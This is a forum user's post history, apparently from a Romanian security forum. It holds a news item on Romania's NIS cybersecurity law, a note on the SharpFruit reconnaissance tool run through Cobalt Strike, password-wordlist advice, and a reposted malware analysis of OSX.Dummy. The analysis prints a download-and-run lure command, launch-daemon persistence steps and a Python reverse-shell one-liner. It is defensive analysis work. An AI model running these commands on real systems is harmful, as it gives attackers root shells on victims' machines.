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Posts posted by Fi8sVrs



    Foto: Mihai Ciobanu

    Președintele României, Klaus Iohannis, a semnat vineri, 28 decembrie a.c., decretul pentru promulgarea Legii privind asigurarea unui nivel comun ridicat de securitate a rețelelor și sistemelor informatice (PL-x 280/02.05.2018).

    Președintele României, Klaus Iohannis, a semnat vineri, 28 decembrie a.c., decretul pentru promulgarea Legii privind asigurarea unui nivel comun ridicat de securitate a rețelelor și sistemelor informatice (PL-x 280/02.05.2018).

    Directiva NIS ( Network Internet Security) stabilește la nivel european un sistem unitar de prevenire și răspuns la incidentele de securitate informatică, având drept scop protejarea și stimularea dezvoltării Pieței Digitale Unice, prin crearea la nivelele naționale a mecanismelor adecvate.


    În context, obiectivele actului normativ promulgat astăzi sunt:
    *stabilirea cadrului de cooperare la nivel național și de participare la nivel european și internațional în domeniul asigurării securității rețelelor și sistemelor informatice,

    *crearea cadrului instituțional prin desemnarea Centrului Național de Răspuns la Incidente de Securitate Cibernetică – CERT-RO ca autoritate competentă,

    *desemnarea entităților de drept public și privat care dețin competențe și responsabilități în aplicarea prevederilor prezentei legi,

    *desemnarea  punctului unic de contact la nivel național și a echipei naționale de răspuns la incidente de securitate informatică – Centrul Național de Răspuns la Incidente de Securitate Cibernetică (CERT-RO)

    *stabilirea cerințelor de securitate și notificare pentru operatorii de servicii esențiale și pentru furnizorii de servicii digitale și instituirea mecanismelor de actualizare a acestora în funcție de evoluția amenințărilor la adresa securității rețelelor și sistemelor informatice


    Mecanisme de cooperare în caz de necesitate

    Astfel,  se instituie mecanisme de cooperare în caz de necesitate între (CERT-RO )și autoritățile competente pe sectoarele și subsectoarele de activitate în cadrul cărora își desfășoară activitatea operatorii de servicii esențiale, în vederea  preîntâmpinării situațiilor în care incidente de securitate informatică inițial minore, care afectează un furnizor de servicii digitale, să  evolueze rapid și să  afecteze infrastructuri critice naționale sau europene.

    Sectoarele și subsectoarele de activitate în cadrul cărora își desfășoară activitatea operatorii de servicii esențiale, sunt: energie, transporturi, bancar, infrastructuri ale pieței financiare, sănătate, furnizare și distribuire de apă potabilă și infrastructură digitală, legea instituind obligații de asigurare a securității și de notificare a incidentelor și furnizorilor de servicii digitale precum: cloud computing, piețe online, motoare de căutare.

    Via: https://www.dcnews.ro/securitate-informatica--noi-reglementari-intrate-in-vigoare_630191.html

    • Upvote 3
  2. SharpFruit

    SharpFruit is a c# port of Find-Fruit.ps1

    SharpFruit is intended to aid Penetration Testers in finding juicy targets on internal networks without nmap scanning.

    As an example, one could execute SharpFruit.exe through Cobalt Strike's Beacon "execute-assembly" module.

    Example usage

    beacon>execute-assembly /root/SharpFruit/SharpFruit.exe --cidr --port 8080

    OR an example using SSL

    beacon>execute-assembly /root/SharpFruit/SharpFruit.exe --cidr --port 9443 --ssl+ --useragent "GoogleBotIsInsideYourNetwork"



    • Upvote 3
  3. On 11/19/2018 at 11:40 PM, Nytro said:



    E ok sa generezi parole daca banuiesti un pattern anume. De exemplu, o data de nastere, un nume, un cuvant cheie.

    E de asemenea in regula sa faci bruteforce pe un anume charset: litere mari, mici si cifre. Dar pentru asta nu e nevoie sa generezi un fisier, programele care iti permit sa fac bruteforce se pot ocupa de asta (e.g. hashcat).


    Solutia cea mai simpla ar fi sa folosesti un dictionar de parole. Un bun exemplu ar fi "rockyou", pentru ca e foarte mare, dar poti gasi multe altele.



    De ce? Cand aveti KRACK



  4. Early today, Remco Verhoef (@remco_verhoef) posted an interesting entry to SANS 'InfoSec Handlers Diary Blog'. Titled "Crypto community target of MacOS malware" he noted:


    "Previous days we've seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary."


    His great writeup notes the initial infection vector and provides an overview of the malware, including its method of persistence (launch daemon) and purpose (reverse shell).


    Here, we dive in a touch deeper into the malware and illustrate how Objective-See's tools can generically thwart this new threat, at every step of the way!


    Want to play along? ☠️
    I've shared the malware, which can be downloaded here (password: infect3d).



    Remco Verhoef states the malware attacks are:


    "originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.


    Apparently attackers are asking users to infect themselves, via the following command:

     $ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script 

    If users fall for this (rather lame social engineering trick, a rather massive machO binary will be downloaded and executed.


    Massive you say? Yes, it clocks in at 34M:

    $ du -h /tmp/script 34M script 

    Using WhatsYourSign, we can see that the malicious binary is not signed:



    Normally such a binary would be blocked by GateKeeper. However if users are downloading and running a binary directly via terminal commands, GateKeeper does not come into play and thus unsigned binary will be allowed to execute. Does this count as a GateKeeper bypass? Maybe? ...I guess the take away here is (yet again) the builtin macOS malware mitigations should never be viewed as a panacea.


    Unfortunately this binary remains 100% undetected (0/60) all AV engines on VirusTotal:



    Moving on, if we open the binary in Hopper, the reason for it's size is clear. Various libraries such as OpenSSL and V8 appear to be statically compiled in:



    Since it's a) Friday PM and b) this binary is massive, filled with all sorts of library code, we're going to skip static analysis and hop right into dynamic analysis.


    In a High Sierra virtual machine (vm) with various Objective-See tools installed, we execute the malware in order to dynamically observe its actions.


    Via the ProcInfo process monitor, it's easy to passively see exactly that malware is up to!


    First, the malware sets script to be owned as root:

    # procInfo
    monitoring for process events...
    process start:
    pid: 432
    path: /usr/bin/sudo
    args: (

    As the malware executes sudo to change the file's permissions to root, this will require the user enter their password in the terminal. This is saved by the malware to /tmp/dumpdummy:

    # sudo fs_usage -w -f filesystem
    open /tmp/dumpdummy script.5354
    pwrite F=19 script.5354
    close F=19 script.5354
    # cat /tmp/dumpdummy

    The malware then sets the script to be executable via chmod +x:

    # procInfo
    monitoring for process events...
    process start:
    path: /usr/bin/sudo
    user: 501
    args: (

    Following this, the malware continues by:

    • moving the script into /var/root
      mv "/tmp/script.sh" "/var/root/"

    • dumping a plist file to /tmp/com.startup.plist and then moving into the LaunchDaemons directory
      mv "/tmp/com.startup.plist" "/Library/LaunchDaemons/

    • setting the owner of the com.startup.plist plist to root
      chown root "/Library/LaunchDaemons/com.startup.plist"

    • launching the com.startup.plist launch daemon
      launchctl load "-w" "/Library/LaunchDaemons/com.startup.plist"


    At this point the malware has persisted a malicious launch daemon. This is kindly noted by BlockBlock which detects and alerts on this persistence attempt:



    As noted in the BlocKBlock alert, the path to the launch daemon plist is /Library/LaunchDaemons/com.startup.plist.

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">

    As the RunAtLoad key is set to true the value of the Program key, /var/root/script.sh, will be automatically executed by the OS whenever the system is rebooted.


    Let's look at the script.sh file:

    while :
            python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
            sleep 5

    Ah a python script! As noted by Remco Verhoef (@remco_verhoef) in his writeup, this will attempt to connect to on port 1337.


    It then duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the -i flag. In other words, it's setting up an interactive reverse shell.


    If you have a firewall product installed, such as Objective-See's LuLu, this network activity will be detected:



    If the connection to the attacker's C&C server ( succeeds, the attacker will be able to arbitrarily execute commands (as root!) on the infected system.



    Today we analyzed a new piece of mac malware. I'm calling it OSX.Dummy as:

    • the infection method is dumb
    • the massive size of the binary is dumb
    • the persistence mechanism is lame (and thus also dumb)
    • the capabilities are rather limited (and thus rather dumb)
    • it's trivial to detect at every step (that dumb)
    • ...and finally, the malware saves the user's password to dumpdummy


    To check if you're infected run KnockKnock as root (since the malware set's it components to be readable only by root). Look for an unsigned launch item com.startup.plist executing something named 'script.sh':



    One can also look for an instance of python running running as root, with the aforementioned reverse shell commands:

    $ ps aux | grep -i python
    root python -c import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]); 


    Source: objective-see.com

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